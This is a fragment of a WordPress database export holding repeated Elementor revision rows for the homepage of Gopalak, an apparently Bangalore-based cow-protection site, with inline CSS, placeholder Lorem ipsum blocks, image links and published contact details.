a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:00','2022-10-10 12:21:00','',1373,'https://gopalak.in/?p=1588',0,'revision','',0),(1589,1,'2022-10-10 17:51:37','2022-10-10 12:21:37','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:37','2022-10-10 12:21:37','',1373,'https://gopalak.in/?p=1589',0,'revision','',0),(1590,1,'2022-10-10 17:51:37','2022-10-10 12:21:37','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-10 17:51:37','2022-10-10 12:21:37','',1373,'https://gopalak.in/?p=1590',0,'revision','',0),(1591,1,'2022-10-10 17:51:37','2022-10-10 12:21:37','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Group-122-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Group-122-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Group-122.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adobt\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img width=\"640\" height=\"400\" src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-1536x960.webp\" alt=\"\" loading=\"lazy\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus 